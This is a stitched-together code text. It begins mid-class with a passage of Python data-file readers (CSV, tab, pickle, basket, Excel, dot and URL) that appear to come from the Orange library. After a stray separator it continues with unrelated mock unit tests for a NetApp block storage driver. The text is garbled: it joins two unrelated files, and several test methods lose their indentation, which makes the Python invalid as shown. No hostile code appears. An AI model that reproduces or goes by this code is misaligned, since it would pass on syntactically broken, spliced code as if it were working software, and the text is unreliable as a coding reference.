                return var.TYPE_HEADERS[0]
            elif var.is_discrete:
                # Ordered discrete vars serialize their value list in order.
                return Flags.join(var.values) if var.ordered else var.TYPE_HEADERS[0]
            raise NotImplementedError
        return ['continuous'] * data.has_weights() + \
               [_vartype(v) for v in chain(data.domain.attributes,
                                           data.domain.class_vars,
                                           data.domain.metas)]
    @staticmethod
    def header_flags(data):
        # Third header row: role flag plus key=value attributes per column.
        return list(chain(['weight'] * data.has_weights(),
                          (Flags.join([flag], *('{}={}'.format(*a)
                                                for a in sorted(var.attributes.items())))
                           for flag, var in chain(zip(repeat(''), data.domain.attributes),
                                                  zip(repeat('class'), data.domain.class_vars),
                                                  zip(repeat('meta'), data.domain.metas)))))
    @classmethod
    def write_headers(cls, write, data):
        """`write` is a callback that accepts an iterable"""
        write(cls.header_names(data))
        write(cls.header_types(data))
        write(cls.header_flags(data))
    @classmethod
    def write_data(cls, write, data):
        """`write` is a callback that accepts an iterable"""
        vars = list(chain((ContinuousVariable('_w'),) if data.has_weights() else (),
                          data.domain.attributes,
                          data.domain.class_vars,
                          data.domain.metas))
        # Normalize W/Y to 2-D so each zipped row flattens consistently.
        for row in zip(data.W if data.W.ndim > 1 else data.W[:, np.newaxis],
                       data.X,
                       data.Y if data.Y.ndim > 1 else data.Y[:, np.newaxis],
                       data.metas):
            write(['' if isinstance(val, Number) and isnan(val) else
                   var.values[int(val)] if var.is_discrete else
                   var.repr_val(val) if isinstance(var, TimeVariable) else
                   val
                   for var, val in zip(vars, flatten(row))])
class CSVReader(FileFormat):
    """Reader for comma separated files"""
    EXTENSIONS = ('.csv',)
    DESCRIPTION = 'Comma-separated values'
    # Candidate delimiters offered to the csv.Sniffer, most likely first.
    DELIMITERS = ',;:\t$ '
    SUPPORT_COMPRESSED = True
    PRIORITY = 20
    def read(self):
        # Try a sequence of encodings, cheapest/most likely first; the last
        # entry decodes with errors='ignore' as a last resort. Each entry is
        # a thunk so detect_encoding() only runs if the earlier ones fail.
        for encoding in (lambda: ('us-ascii', None),  # fast
                         lambda: (detect_encoding(self.filename), None),  # precise
                         lambda: (locale.getpreferredencoding(False), None),
                         lambda: (sys.getdefaultencoding(), None),  # desperate
                         lambda: ('utf-8', None),  # ...
                         lambda: ('utf-8', 'ignore')):  # fallback
            encoding, errors = encoding()
            # Clear the error flag for all except the last check, because
            # the error of second-to-last check is stored and shown as warning in owfile
            if errors != 'ignore':
                error = ''
            with self.open(self.filename, mode='rt', newline='',
                           encoding=encoding, errors=errors) as file:
                # Sniff the CSV dialect (delimiter, quotes, ...)
                try:
                    dialect = csv.Sniffer().sniff(file.read(1024), self.DELIMITERS)
                except UnicodeDecodeError as e:
                    error = e
                    continue
                except csv.Error:
                    # Sniffing failed; fall back to Excel dialect with our
                    # most likely delimiter.
                    dialect = csv.excel()
                    dialect.delimiter = self.DELIMITERS[0]
                file.seek(0)
                dialect.skipinitialspace = True
                try:
                    reader = csv.reader(file, dialect=dialect)
                    data = self.data_table(reader)
                    if error and isinstance(error, UnicodeDecodeError):
                        # Surface bytes skipped by the 'ignore' fallback.
                        pos, endpos = error.args[2], error.args[3]
                        warning = ('Skipped invalid byte(s) in position '
                                   '{}{}').format(pos,
                                                  ('-' + str(endpos)) if (endpos - pos) > 1 else '')
                        warnings.warn(warning)
                    self.set_table_metadata(self.filename, data)
                    return data
                except Exception as e:
                    error = e
                    continue
        raise ValueError('Cannot parse dataset {}: {}'.format(self.filename, error))
class TabReader(CSVReader):
    """Reader for tab separated files"""
    EXTENSIONS = ('.tab', '.tsv')
    DESCRIPTION = 'Tab-separated values'
    # Tab only: inherits all reading logic from CSVReader.
    DELIMITERS = '\t'
    PRIORITY = 10
class PickleReader(FileFormat):
    """Reader for pickled Table objects"""
    EXTENSIONS = ('.pickle', '.pkl')
    DESCRIPTION = 'Pickled Python object file'
    def read(self):
        """Unpickle and return the object stored in ``self.filename``."""
        with open(self.filename, 'rb') as stream:
            return pickle.load(stream)
    @staticmethod
    def write_file(filename, data):
        """Pickle ``data`` to ``filename`` using the highest protocol."""
        with open(filename, 'wb') as stream:
            pickle.dump(data, stream, pickle.HIGHEST_PROTOCOL)
class BasketReader(FileFormat):
    """Reader for basket (sparse) files"""
    EXTENSIONS = ('.basket', '.bsk')
    DESCRIPTION = 'Basket file'
    def read(self):
        def constr_vars(inds):
            # Build ContinuousVariables ordered by their column index.
            # NOTE: implicitly returns None when `inds` is empty/falsy.
            if inds:
                return [ContinuousVariable(x.decode("utf-8")) for _, x in
                        sorted((ind, name) for name, ind in inds.items())]
        X, Y, metas, attr_indices, class_indices, meta_indices = \
            _io.sparse_read_float(self.filename.encode(sys.getdefaultencoding()))
        attrs = constr_vars(attr_indices)
        classes = constr_vars(class_indices)
        meta_attrs = constr_vars(meta_indices)
        domain = Domain(attrs, classes, meta_attrs)
        # `x and y` passes y only when x is truthy, else the falsy x.
        # NOTE(review): the last argument passes meta_attrs (variables)
        # rather than the `metas` data array -- looks suspicious; confirm
        # against Table.from_numpy's expected signature.
        return Table.from_numpy(
            domain, attrs and X, classes and Y, metas and meta_attrs)
class ExcelReader(FileFormat):
    """Reader for Excel files (via the xlrd package)."""
    EXTENSIONS = ('.xls', '.xlsx')
    # Fixed typo in the user-visible description ("Mircosoft").
    DESCRIPTION = 'Microsoft Excel spreadsheet'
    def __init__(self, filename):
        """Open `filename` eagerly so `sheets` is available immediately."""
        super().__init__(filename)
        from xlrd import open_workbook
        self.workbook = open_workbook(self.filename)
    @property
    @lru_cache(1)
    def sheets(self):
        """Names of all sheets in the workbook (cached)."""
        return self.workbook.sheet_names()
    def read(self):
        """Parse the selected (or first) sheet into an Orange Table.

        Trims leading empty rows/columns, stringifies every remaining cell,
        and delegates header/type inference to FileFormat.data_table().
        Raises IOError on any parsing failure.
        """
        import xlrd
        wb = xlrd.open_workbook(self.filename, on_demand=True)
        if self.sheet:
            ss = wb.sheet_by_name(self.sheet)
        else:
            ss = wb.sheet_by_index(0)
        try:
            # Skip fully-empty leading rows and columns.
            first_row = next(i for i in range(ss.nrows) if any(ss.row_values(i)))
            first_col = next(i for i in range(ss.ncols) if ss.cell_value(first_row, i))
            row_len = ss.row_len(first_row)
            cells = filter(any,
                           [[str(ss.cell_value(row, col)) if col < ss.row_len(row) else ''
                             for col in range(first_col, row_len)]
                            for row in range(first_row, ss.nrows)])
            table = self.data_table(cells)
        except Exception:
            raise IOError("Couldn't load spreadsheet from " + self.filename)
        return table
class DotReader(FileFormat):
    """Writer for dot (graph) files"""
    EXTENSIONS = ('.dot', '.gv')
    DESCRIPTION = 'Dot graph description'
    SUPPORT_COMPRESSED = True
    @classmethod
    def write_graph(cls, filename, graph):
        """Export a fitted sklearn tree `graph` to Graphviz dot format."""
        from sklearn import tree
        tree.export_graphviz(graph, out_file=cls.open(filename, 'wt'))
    @classmethod
    def write(cls, filename, tree):
        """Write `tree` (or a dict wrapping it under the 'tree' key).

        isinstance() instead of an exact type() comparison also accepts
        dict subclasses (e.g. OrderedDict) carrying the model.
        """
        if isinstance(tree, dict):
            tree = tree['tree']
        cls.write_graph(filename, tree)
class UrlReader(FileFormat):
    """Reader that downloads a URL into a temporary file and delegates to
    the registered reader matching the downloaded file's extension."""
    def read(self):
        """Fetch `self.filename` (a URL) and parse it into a data table."""
        self.filename = self._trim(self._resolve_redirects(self.filename))
        with contextlib.closing(urlopen(self.filename, timeout=10)) as response:
            name = self._suggest_filename(response.headers['content-disposition'])
            with NamedTemporaryFile(suffix=name, delete=False) as f:
                f.write(response.read())
                # delete=False is a workaround for https://bugs.python.org/issue14243
            reader = self.get_reader(f.name)
            data = reader.read()
            unlink(f.name)
        # Override name set in from_file() to avoid holding the temp prefix
        data.name = path.splitext(name)[0]
        data.origin = self.filename
        return data
    def _resolve_redirects(self, url):
        # Resolve (potential) redirects to a final URL
        with contextlib.closing(urlopen(url, timeout=10)) as response:
            return response.url
    def _trim(self, url):
        """Rewrite known share-page URLs into direct-download URLs."""
        URL_TRIMMERS = (
            self._trim_googlesheet_url,
        )
        for trim in URL_TRIMMERS:
            try:
                url = trim(url)
            except ValueError:
                continue
            else:
                break
        return url
    def _trim_googlesheet_url(self, url):
        """Turn a Google Sheets share URL into its TSV export URL.

        Raises ValueError when `url` is not a Google Sheets URL.
        """
        # Raw strings: previously these were plain strings containing
        # invalid escape sequences ('\.', '\w', '\d'), which emit
        # DeprecationWarnings; the compiled pattern is unchanged.
        match = re.match(r'(?:https?://)?(?:www\.)?'
                         r'docs\.google\.com/spreadsheets/d/'
                         r'(?P<workbook_id>[-\w_]+)'
                         r'(?:/.*?gid=(?P<sheet_id>\d+).*|.*)?',
                         url, re.IGNORECASE)
        try:
            workbook, sheet = match.group('workbook_id'), match.group('sheet_id')
            if not workbook:
                raise ValueError
        except (AttributeError, ValueError):
            raise ValueError
        url = 'https://docs.google.com/spreadsheets/d/{}/export?format=tsv'.format(workbook)
        if sheet:
            url += '&gid=' + sheet
        return url
    def _suggest_filename(self, content_disposition):
        """Derive a safe local filename from the Content-Disposition header,
        falling back to a sanitized form of the URL path."""
        default_name = re.sub(r'[\\:/]', '_', urlparse(self.filename).path)
        # See https://tools.ietf.org/html/rfc6266#section-4.1
        matches = re.findall(r"filename\*?=(?:\"|.{0,10}?'[^']*')([^\"]+)",
                             content_disposition or '')
        return urlunquote(matches[-1]) if matches else default_name
| |
# Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2014 Andrew Kerr. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# Copyright (c) 2015 Goutham Pacha Ravi. All rights reserved.
# Copyright (c) 2015 Dustin Schoenbrun. All rights reserved.
# Copyright (c) 2016 Chuck Fouts. All rights reserved.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Mock unit tests for the NetApp block storage library
"""
import copy
import uuid
import mock
from oslo_log import versionutils
from oslo_utils import units
import six
from jacket.storage import exception
from jacket.storage.i18n import _, _LW
from jacket.storage import test
from jacket.tests.storage.unit.volume.drivers.netapp.dataontap import fakes as fake
import jacket.tests.storage.unit.volume.drivers.netapp.fakes as na_fakes
from jacket.storage.volume.drivers.netapp.dataontap import block_base
from jacket.storage.volume.drivers.netapp.dataontap.client import api as netapp_api
from jacket.storage.volume.drivers.netapp import utils as na_utils
from jacket.storage.volume import utils as volume_utils
class NetAppBlockStorageLibraryTestCase(test.TestCase):
    def setUp(self):
        # Build the library under test with a fake configuration and a
        # mocked ZAPI client so no real storage backend is contacted.
        super(NetAppBlockStorageLibraryTestCase, self).setUp()
        kwargs = {'configuration': self.get_config_base()}
        self.library = block_base.NetAppBlockStorageLibrary(
            'driver', 'protocol', **kwargs)
        self.library.zapi_client = mock.Mock()
        self.zapi_client = self.library.zapi_client
        self.mock_request = mock.Mock()
    def tearDown(self):
        # No extra cleanup needed; delegate to the base TestCase.
        super(NetAppBlockStorageLibraryTestCase, self).tearDown()
    def get_config_base(self):
        # Fresh fake driver configuration for each test.
        return na_fakes.create_configuration()
    @mock.patch.object(versionutils, 'report_deprecated_feature')
    def test_get_reserved_percentage_default_multipler(self, mock_report):
        # With netapp_size_multiplier at its default, the configured
        # reserved_percentage is returned and no deprecation is reported.
        # NOTE: 'multipler' typo is in the method name itself; renaming
        # would churn test IDs, so it is only flagged here.
        default = 1.2
        reserved_percentage = 20.0
        self.library.configuration.netapp_size_multiplier = default
        self.library.configuration.reserved_percentage = reserved_percentage
        result = self.library._get_reserved_percentage()
        self.assertEqual(reserved_percentage, result)
        self.assertFalse(mock_report.called)
    @mock.patch.object(versionutils, 'report_deprecated_feature')
    def test_get_reserved_percentage(self, mock_report):
        # A non-default multiplier derives the reserved percentage and
        # reports the deprecation of netapp_size_multiplier.
        multiplier = 2.0
        self.library.configuration.netapp_size_multiplier = multiplier
        result = self.library._get_reserved_percentage()
        reserved_ratio = round(1 - (1 / multiplier), 2)
        # NOTE(review): 100 * int(reserved_ratio) truncates the ratio
        # (int(0.5) == 0); this mirrors the library's own computation --
        # confirm the truncation is intentional there.
        reserved_percentage = 100 * int(reserved_ratio)
        self.assertEqual(reserved_percentage, result)
        msg = _LW('The "netapp_size_multiplier" configuration option is '
                  'deprecated and will be removed in the Mitaka release. '
                  'Please set "reserved_percentage = %d" instead.') % (
            result)
        mock_report.assert_called_once_with(block_base.LOG, msg)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr',
                       mock.Mock(return_value={'Volume': 'FAKE_CMODE_VOL1'}))
    def test_get_pool(self):
        # Pool name comes from the LUN's 'Volume' metadata attribute.
        pool = self.library.get_pool({'name': 'volume-fake-uuid'})
        self.assertEqual('FAKE_CMODE_VOL1', pool)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr',
                       mock.Mock(return_value=None))
    def test_get_pool_no_metadata(self):
        # Missing LUN metadata yields no pool.
        pool = self.library.get_pool({'name': 'volume-fake-uuid'})
        self.assertIsNone(pool)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr',
                       mock.Mock(return_value=dict()))
    def test_get_pool_volume_unknown(self):
        # Metadata present but without a 'Volume' key also yields no pool.
        pool = self.library.get_pool({'name': 'volume-fake-uuid'})
        self.assertIsNone(pool)
    def test_create_volume(self):
        # Happy path: the LUN is created in the extracted pool with the
        # right size/metadata, no QoS cleanup and no error logging happen.
        volume_size_in_bytes = int(fake.SIZE) * units.Gi
        self.mock_object(na_utils, 'get_volume_extra_specs')
        self.mock_object(na_utils, 'log_extra_spec_warnings')
        self.mock_object(block_base, 'LOG')
        self.mock_object(volume_utils, 'extract_host', mock.Mock(
            return_value=fake.POOL_NAME))
        self.mock_object(self.library, '_setup_qos_for_volume',
                         mock.Mock(return_value=None))
        self.mock_object(self.library, '_create_lun')
        self.mock_object(self.library, '_create_lun_handle')
        self.mock_object(self.library, '_add_lun_to_table')
        self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
        self.library.create_volume(fake.VOLUME)
        self.library._create_lun.assert_called_once_with(
            fake.POOL_NAME, fake.LUN_NAME, volume_size_in_bytes,
            fake.LUN_METADATA, None)
        self.assertEqual(0, self.library.
                         _mark_qos_policy_group_for_deletion.call_count)
        self.assertEqual(0, block_base.LOG.error.call_count)
    def test_create_volume_no_pool(self):
        # extract_host returning None (no pool) must raise InvalidHost.
        self.mock_object(volume_utils, 'extract_host', mock.Mock(
            return_value=None))
        self.assertRaises(exception.InvalidHost, self.library.create_volume,
                          fake.VOLUME)
    def test_create_volume_exception_path(self):
        # A failure inside _create_lun must mark the QoS policy group for
        # deletion, log the exception, and raise VolumeBackendAPIException.
        self.mock_object(block_base, 'LOG')
        self.mock_object(na_utils, 'get_volume_extra_specs')
        self.mock_object(self.library, '_setup_qos_for_volume',
                         mock.Mock(return_value=None))
        self.mock_object(self.library, '_create_lun', mock.Mock(
            side_effect=Exception))
        self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library.create_volume, fake.VOLUME)
        self.assertEqual(1, self.library.
                         _mark_qos_policy_group_for_deletion.call_count)
        self.assertEqual(1, block_base.LOG.exception.call_count)
    def test_create_volume_no_pool_provided_by_scheduler(self):
        # A host string without a '#pool' suffix must be rejected.
        fake_volume = copy.deepcopy(fake.VOLUME)
        # Set up fake volume whose 'host' field is missing pool information.
        fake_volume['host'] = '%s@%s' % (fake.HOST_NAME, fake.BACKEND_NAME)
        self.assertRaises(exception.InvalidHost, self.library.create_volume,
                          fake_volume)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_or_create_igroup')
    def test_map_lun(self, mock_get_or_create_igroup, mock_get_lun_attr):
        # Matching host OS: the LUN is mapped using its own OS type and the
        # ZAPI-assigned LUN id is returned.
        os = 'linux'
        protocol = 'fcp'
        self.library.host_type = 'linux'
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
        mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
                                                  'iscsi')
        self.zapi_client.map_lun.return_value = '1'
        lun_id = self.library._map_lun('fake_volume',
                                       fake.FC_FORMATTED_INITIATORS,
                                       protocol, None)
        self.assertEqual('1', lun_id)
        mock_get_or_create_igroup.assert_called_once_with(
            fake.FC_FORMATTED_INITIATORS, protocol, os)
        self.zapi_client.map_lun.assert_called_once_with(
            fake.LUN_PATH, fake.IGROUP1_NAME, lun_id=None)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary, '_get_lun_attr')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_or_create_igroup')
    @mock.patch.object(block_base, 'LOG', mock.Mock())
    def test_map_lun_mismatch_host_os(
            self, mock_get_or_create_igroup, mock_get_lun_attr):
        # When the LUN's OS type differs from the configured host type, the
        # igroup must use the host type and a warning must be logged.
        os = 'windows'
        protocol = 'fcp'
        self.library.host_type = 'linux'
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
        mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
                                                  'iscsi')
        self.library._map_lun('fake_volume',
                              fake.FC_FORMATTED_INITIATORS,
                              protocol, None)
        mock_get_or_create_igroup.assert_called_once_with(
            fake.FC_FORMATTED_INITIATORS, protocol,
            self.library.host_type)
        self.zapi_client.map_lun.assert_called_once_with(
            fake.LUN_PATH, fake.IGROUP1_NAME, lun_id=None)
        self.assertEqual(1, block_base.LOG.warning.call_count)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_or_create_igroup')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_find_mapped_lun_igroup')
    def test_map_lun_preexisting(self, mock_find_mapped_lun_igroup,
                                 mock_get_or_create_igroup, mock_get_lun_attr):
        # If map_lun fails because the LUN is already mapped, the id of the
        # existing mapping is returned instead of raising.
        os = 'linux'
        protocol = 'fcp'
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
        mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
                                                  'iscsi')
        mock_find_mapped_lun_igroup.return_value = (fake.IGROUP1_NAME, '2')
        self.zapi_client.map_lun.side_effect = netapp_api.NaApiError
        lun_id = self.library._map_lun(
            'fake_volume', fake.FC_FORMATTED_INITIATORS, protocol, None)
        self.assertEqual('2', lun_id)
        mock_find_mapped_lun_igroup.assert_called_once_with(
            fake.LUN_PATH, fake.FC_FORMATTED_INITIATORS)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_or_create_igroup')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_find_mapped_lun_igroup')
    def test_map_lun_api_error(self, mock_find_mapped_lun_igroup,
                               mock_get_or_create_igroup, mock_get_lun_attr):
        # If no existing mapping explains the failure, the NaApiError from
        # map_lun must propagate to the caller.
        os = 'linux'
        protocol = 'fcp'
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH, 'OsType': os}
        mock_get_or_create_igroup.return_value = (fake.IGROUP1_NAME, os,
                                                  'iscsi')
        mock_find_mapped_lun_igroup.return_value = (None, None)
        self.zapi_client.map_lun.side_effect = netapp_api.NaApiError
        self.assertRaises(netapp_api.NaApiError, self.library._map_lun,
                          'fake_volume', fake.FC_FORMATTED_INITIATORS,
                          protocol, None)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_find_mapped_lun_igroup')
    def test_unmap_lun(self, mock_find_mapped_lun_igroup):
        """Unmapping resolves the mapped igroup and unmaps the LUN from it."""
        mock_find_mapped_lun_igroup.return_value = (fake.IGROUP1_NAME, 1)
        self.library._unmap_lun(fake.LUN_PATH, fake.FC_FORMATTED_INITIATORS)
        self.zapi_client.unmap_lun.assert_called_once_with(fake.LUN_PATH,
                                                           fake.IGROUP1_NAME)
def test_find_mapped_lun_igroup(self):
self.assertRaises(NotImplementedError,
self.library._find_mapped_lun_igroup,
fake.LUN_PATH,
fake.FC_FORMATTED_INITIATORS)
    def test_has_luns_mapped_to_initiators(self):
        """The mapped-LUN check is delegated straight to the ZAPI client."""
        self.zapi_client.has_luns_mapped_to_initiators.return_value = True
        self.assertTrue(self.library._has_luns_mapped_to_initiators(
            fake.FC_FORMATTED_INITIATORS))
        self.zapi_client.has_luns_mapped_to_initiators.assert_called_once_with(
            fake.FC_FORMATTED_INITIATORS)
    def test_get_or_create_igroup_preexisting(self):
        """An igroup that already contains the initiators is reused."""
        self.zapi_client.get_igroup_by_initiators.return_value = [fake.IGROUP1]
        self.library._create_igroup_add_initiators = mock.Mock()
        igroup_name, host_os, ig_type = self.library._get_or_create_igroup(
            fake.FC_FORMATTED_INITIATORS, 'fcp', 'linux')
        self.assertEqual(fake.IGROUP1_NAME, igroup_name)
        self.assertEqual('linux', host_os)
        self.assertEqual('fcp', ig_type)
        self.zapi_client.get_igroup_by_initiators.assert_called_once_with(
            fake.FC_FORMATTED_INITIATORS)
        # No new igroup may be created when a matching one already exists.
        self.assertEqual(
            0, self.library._create_igroup_add_initiators.call_count)
    @mock.patch.object(uuid, 'uuid4', mock.Mock(return_value=fake.UUID1))
    def test_get_or_create_igroup_none_preexisting(self):
        """This method also tests _create_igroup_add_initiators."""
        self.zapi_client.get_igroup_by_initiators.return_value = []
        igroup_name, os, ig_type = self.library._get_or_create_igroup(
            fake.FC_FORMATTED_INITIATORS, 'fcp', 'linux')
        # A fresh igroup is named from the mocked uuid4 value.
        self.assertEqual('openstack-' + fake.UUID1, igroup_name)
        self.zapi_client.create_igroup.assert_called_once_with(
            igroup_name, 'fcp', 'linux')
        # Each initiator must be added to the new igroup individually.
        self.assertEqual(len(fake.FC_FORMATTED_INITIATORS),
                         self.zapi_client.add_igroup_initiator.call_count)
        self.assertEqual('linux', os)
        self.assertEqual('fcp', ig_type)
def test_get_fc_target_wwpns(self):
self.assertRaises(NotImplementedError,
self.library._get_fc_target_wwpns)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_build_initiator_target_map')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_map_lun')
    def test_initialize_connection_fc(self, mock_map_lun,
                                      mock_build_initiator_target_map):
        """A successful FC attach returns the expected target info dict."""
        self.maxDiff = None
        mock_map_lun.return_value = '1'
        mock_build_initiator_target_map.return_value = (fake.FC_TARGET_WWPNS,
                                                        fake.FC_I_T_MAP, 4)
        target_info = self.library.initialize_connection_fc(fake.FC_VOLUME,
                                                            fake.FC_CONNECTOR)
        self.assertDictEqual(target_info, fake.FC_TARGET_INFO)
        mock_map_lun.assert_called_once_with(
            'fake_volume', fake.FC_FORMATTED_INITIATORS, 'fcp', None)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_build_initiator_target_map')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_map_lun')
    def test_initialize_connection_fc_no_wwpns(
            self, mock_map_lun, mock_build_initiator_target_map):
        """FC attach fails when no target WWPNs can be resolved."""
        mock_map_lun.return_value = '1'
        mock_build_initiator_target_map.return_value = (None, None, 0)
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.library.initialize_connection_fc,
                          fake.FC_VOLUME,
                          fake.FC_CONNECTOR)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_has_luns_mapped_to_initiators')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_unmap_lun')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr')
    def test_terminate_connection_fc(self, mock_get_lun_attr, mock_unmap_lun,
                                     mock_has_luns_mapped_to_initiators):
        """Detach unmaps the LUN; zoning is kept while LUNs remain mapped."""
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH}
        mock_unmap_lun.return_value = None
        mock_has_luns_mapped_to_initiators.return_value = True
        target_info = self.library.terminate_connection_fc(fake.FC_VOLUME,
                                                           fake.FC_CONNECTOR)
        # Empty target info means no unzoning data is returned.
        self.assertDictEqual(target_info, fake.FC_TARGET_INFO_EMPTY)
        mock_unmap_lun.assert_called_once_with(fake.LUN_PATH,
                                               fake.FC_FORMATTED_INITIATORS)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_build_initiator_target_map')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_has_luns_mapped_to_initiators')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_unmap_lun')
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_lun_attr')
    def test_terminate_connection_fc_no_more_luns(
            self, mock_get_lun_attr, mock_unmap_lun,
            mock_has_luns_mapped_to_initiators,
            mock_build_initiator_target_map):
        """When the last LUN is unmapped, unzoning info is returned."""
        mock_get_lun_attr.return_value = {'Path': fake.LUN_PATH}
        mock_unmap_lun.return_value = None
        # No LUNs remain mapped, so the I-T map is built for unzoning.
        mock_has_luns_mapped_to_initiators.return_value = False
        mock_build_initiator_target_map.return_value = (fake.FC_TARGET_WWPNS,
                                                        fake.FC_I_T_MAP, 4)
        target_info = self.library.terminate_connection_fc(fake.FC_VOLUME,
                                                           fake.FC_CONNECTOR)
        self.assertDictEqual(target_info, fake.FC_TARGET_INFO_UNMAP)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_fc_target_wwpns')
    def test_build_initiator_target_map_no_lookup_service(
            self, mock_get_fc_target_wwpns):
        """Without a lookup service, the complete I-T map is returned."""
        self.library.lookup_service = None
        mock_get_fc_target_wwpns.return_value = fake.FC_FORMATTED_TARGET_WWPNS
        (target_wwpns, init_targ_map, num_paths) = \
            self.library._build_initiator_target_map(fake.FC_CONNECTOR)
        self.assertSetEqual(set(fake.FC_TARGET_WWPNS), set(target_wwpns))
        self.assertDictEqual(fake.FC_I_T_MAP_COMPLETE, init_targ_map)
        self.assertEqual(0, num_paths)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_get_fc_target_wwpns')
    def test_build_initiator_target_map_with_lookup_service(
            self, mock_get_fc_target_wwpns):
        """With a lookup service, the fabric map constrains the I-T pairs."""
        self.library.lookup_service = mock.Mock()
        self.library.lookup_service.get_device_mapping_from_network.\
            return_value = fake.FC_FABRIC_MAP
        mock_get_fc_target_wwpns.return_value = fake.FC_FORMATTED_TARGET_WWPNS
        (target_wwpns, init_targ_map, num_paths) = \
            self.library._build_initiator_target_map(fake.FC_CONNECTOR)
        self.assertSetEqual(set(fake.FC_TARGET_WWPNS), set(target_wwpns))
        self.assertDictEqual(fake.FC_I_T_MAP, init_targ_map)
        self.assertEqual(4, num_paths)
    @mock.patch.object(na_utils, 'check_flags')
    def test_do_setup_san_configured(self, mock_check_flags):
        """Explicitly configured LUN/host types are honored by do_setup."""
        self.library.configuration.netapp_lun_ostype = 'windows'
        self.library.configuration.netapp_host_type = 'solaris'
        self.library.configuration.netapp_lun_space_reservation = 'disabled'
        self.library.do_setup(mock.Mock())
        self.assertTrue(mock_check_flags.called)
        self.assertEqual('windows', self.library.lun_ostype)
        self.assertEqual('solaris', self.library.host_type)
    @mock.patch.object(na_utils, 'check_flags')
    def test_do_setup_san_unconfigured(self, mock_check_flags):
        """Unset LUN/host types default to 'linux' during do_setup."""
        self.library.configuration.netapp_lun_ostype = None
        self.library.configuration.netapp_host_type = None
        self.library.configuration.netapp_lun_space_reservation = 'enabled'
        self.library.do_setup(mock.Mock())
        self.assertTrue(mock_check_flags.called)
        self.assertEqual('linux', self.library.lun_ostype)
        self.assertEqual('linux', self.library.host_type)
def test_do_setup_space_reservation_disabled(self):
self.mock_object(na_utils, 'check_flags')
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.configuration.netapp_lun_space_reservation = 'disabled'
self.library.do_setup(mock.Mock())
self.assertEqual('false', self.library.lun_space_reservation)
def test_do_setup_space_reservation_enabled(self):
self.mock_object(na_utils, 'check_flags')
self.library.configuration.netapp_lun_ostype = None
self.library.configuration.netapp_host_type = None
self.library.configuration.netapp_lun_space_reservation = 'enabled'
self.library.do_setup(mock.Mock())
self.assertEqual('true', self.library.lun_space_reservation)
def test_get_existing_vol_manage_missing_id_path(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.library._get_existing_vol_with_manage_ref,
{})
    def test_get_existing_vol_manage_not_found(self):
        """A manage ref that matches no LUN on the backend is rejected."""
        self.zapi_client.get_lun_by_args.return_value = []
        self.assertRaises(exception.ManageExistingInvalidReference,
                          self.library._get_existing_vol_with_manage_ref,
                          {'source-id': 'src_id',
                           'source-name': 'lun_path'})
        self.assertEqual(1, self.zapi_client.get_lun_by_args.call_count)
    @mock.patch.object(block_base.NetAppBlockStorageLibrary,
                       '_extract_lun_info',
                       mock.Mock(return_value=block_base.NetAppLun(
                           'lun0', 'lun0', '3', {'UUID': 'src_id'})))
    def test_get_existing_vol_manage_lun(self):
        """The LUN whose UUID matches source-id is selected and extracted."""
        self.zapi_client.get_lun_by_args.return_value = ['lun0', 'lun1']
        lun = self.library._get_existing_vol_with_manage_ref(
            {'source-id': 'src_id', 'path': 'lun_path'})
